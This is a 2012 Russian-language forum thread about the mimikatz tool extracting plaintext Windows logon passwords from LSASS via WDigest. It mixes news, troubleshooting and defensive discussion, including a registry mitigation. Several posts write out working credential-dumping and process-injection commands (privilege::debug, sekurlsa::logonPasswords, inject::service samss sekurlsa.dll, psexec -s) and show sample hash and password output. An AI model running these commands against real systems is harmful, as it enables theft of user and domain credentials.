Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Новости и события Microsoft (http://forum.oszone.net/forumdisplay.php?f=65)
-   -   Обнаружена опасная уязвимость в Microsoft Windows (http://forum.oszone.net/showthread.php?t=228434)

exo 21-02-2012 18:50 1863746

Обнаружена опасная уязвимость в Microsoft Windows
 
Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании HIPS
Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.
Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.
Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

privilege::debug
sekurlsa::logonPasswords full

Вывод будет примерно следующим:
Цитата:

Authentification Id : 0;210550
Package d'authentification : Kerberos
Utilisateur principal : user
Domaine d'authentification : domain
msv1_0 :
* Utilisateur : user
* Domaine : domain
* Hash LM : 25d934a376b906731d71060d896b7a46
* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
wdigest :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
tspkg :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
новость взял отсюда
скачать утилиту можно отсюда

лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.

snark 21-02-2012 22:38 1863927

Печально... и никаких "противоядий" нету?

exo 21-02-2012 23:39 1863961

Цитата:

Цитата snark
и никаких "противоядий" нету? »

ищу варианты с удалением пароля после выхода из системы. после перезагрузки - пароля нет.

Severny 22-02-2012 00:17 1863982

http://devteev.blogspot.com/2012/02/0day-lsa.html
Противоядие здесь, но если о нем не знает атакующий.

Цитата:

В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.
Однако пригодится штуковина.

exo 22-02-2012 00:25 1863992

Цитата:

Цитата Severny
Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке. »

если у него прав хватит на реестр.

Delirium 22-02-2012 01:57 1864024

Цитата:

Цитата exo
Если пользователь имеет права локального администратора, он может получить пароли всех пользователей, которые работали до него без перезагрузки компьютера... в том числе и доменного админа... »

Если пользователь локальный админ - тушите свечи сразу.
А доменному админу вооообще нечего делать локально на машине, для этого должны существовать отдельные учетные записи.
А вообще интересно.

Severny 22-02-2012 19:57 1864632

Цитата:

Цитата exo
если у него прав хватит на реестр. »

С правами сложности у атакующего могут возникнуть, а так на всякий случай лежит собственная regedit.exe в комплекте.

exo 25-07-2012 20:05 1958702

решил я тут на днях вспомнить как это делается. Не получается: при проверке lsass.exe отказано в доступе. Может какие обновления были в винде...
Или от того, что NOD32 установили... но на компе без антивируса - всё работает...

winbond 27-07-2012 01:14 1959702

На 8 и 2012 неактуально. cmd под админом:

"mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 636
Erreur : Impossible d'injecter ! ; (0x00000005) Отказано в доступе.

mimikatz # @getLogonPasswords
Erreur : pas ou plus de communication etablie"

exo 27-07-2012 01:51 1959709

вот тоже самое получаю в некоторых 7-ых компах..

Rezor666 27-07-2012 09:09 1959784

Тьфу ты блин ) Я уж думал что по интереснее...
Цитата:

Цитата exo
которые работали до него без перезагрузки компьютера... »

Вот будет кто то стоять со свечкой и ждать пока админ ведет пароль и не дай бог комп ребутнет.
А вообще кому оно нафиг надо? Если человек раздает локального админа всем то он дурак.

exo 27-07-2012 10:58 1959841

Цитата:

Цитата Rezor666
А вообще кому оно нафиг надо? »

компрометация

winbond 27-07-2012 13:34 1959936

Попробовал на работе. Также получает отлуп. Ни на 7 x86/2008 R2 SP1 не выходит, ни на 2003 R2 x86. Апдейты через wsus. Посмотрел блог повнимательней - автор вроде как пишет что на 70% x86 систем и на 90% x64 чего-то у него не совсем срастается и обещает удивить тех у кого установлена Win 8. Ну-ну, посмотрим... :)

exo 27-07-2012 13:48 1959948

Цитата:

Цитата winbond
на 90% x64 чего-то не совсем срастается»

я когда это пробовал зимой - у 100% было. сейчас я попробую у тех, у кого получалось.
проверил - теперь не работает. При этом в дистрибутиве утилиты отсутствовал файл sekurlsa.dll Пришлось заново закачивать, но не помолго

gentilkiwi 27-07-2012 17:09 1960162

I'm very interested to have feedbacks on your Windows version !

Don't forget this facts :
  • NT 5 - Console
    Код:

    privilege::debug
    inject::service samss sekurlsa.dll
    ....

  • NT 5 - RDP
    Код:

    psexec -s cmd
    or
    Код:

    psexec -s mimikatz
    then
    Код:

    inject::service samss sekurlsa.dll
    ....

  • NT 6 (Console & RDP, include Win8)
    Код:

    privilege::debug
    inject::service samss sekurlsa.dll
    ....


Gentil Kiwi (my mail is on http://blog.gentilkiwi.com/contact)

exo 27-07-2012 17:19 1960168

Цитата:

Цитата gentilkiwi
inject::service samss sekurlsa.dll »

same: access denied

вообщем, пообщавшись с gentilkiwi выяснилось что запрет появился после установки ESEN NOD 32. У него есть некий модуль HIPS, он и блокирует доступ к файлу.

gentilkiwi 27-07-2012 17:56 1960193

Like sayed in PM, if security softwares like Antivirus / HIPS / Behavior scans /... lock mimikatz access to LSASS, it's not a mimikatz issue ;)

Don't forget it's a POC tool, not a hack tool ;)

* I've made test on an up to date x64 7, no problem at all

gentilkiwi 27-07-2012 20:32 1960266

ESET is not the best HIPS after all ;)

http://img52.imageshack.us/img52/555...0727182837.png

Driver exposed not available at this time.

exo 27-07-2012 21:05 1960285

gentilkiwi, can you make screen smaller?
i'll checking this on Monday.

Цитата:

Цитата Rezor666
Если человек раздает локального админа всем то он дурак. »

тут ещё такой момент. с человеком, который у вас работает, можно договорится. Объяснить ему, что такое хорошо и что такое плохо.
А вот вирусам это не объяснишь. написать вирус, который будет выполнять эти действия - не проблема. поэтому хочется понять, как это работает, чтобы закрыть.

winbond 27-07-2012 21:59 1960312

Win 7 x86 - MSE.
2008 R2 - MS Defender
2003 R2 - там да, NOD32 5.
На 8 и 2012 встроенный.

Ни на одном не прокатило. Все ОС обновлены по максимуму - в конторе это несложно, дома тем более.
Резюме: на машине без антивируса, под локальным админом и без перезагрузки. Как-то уже не впечатляет )

exo 27-07-2012 22:25 1960325

Цитата:

Цитата winbond
на машине без антивируса, под локальным админом и без перезагрузки. Как-то уже не впечатляет »

поверьте, такие пользователи есть, иначе бы писать на форум было бы некому....

Delirium 30-07-2012 01:20 1961284

Я чего то не понял, у нас англоязычный форум уже?
gentilkiwi, exo, предупреждение по ОПК 2.3.
gentilkiwi, official language at this forum - Russian.


Время: 21:32.

Время: 21:32.
© OSzone.net 2001-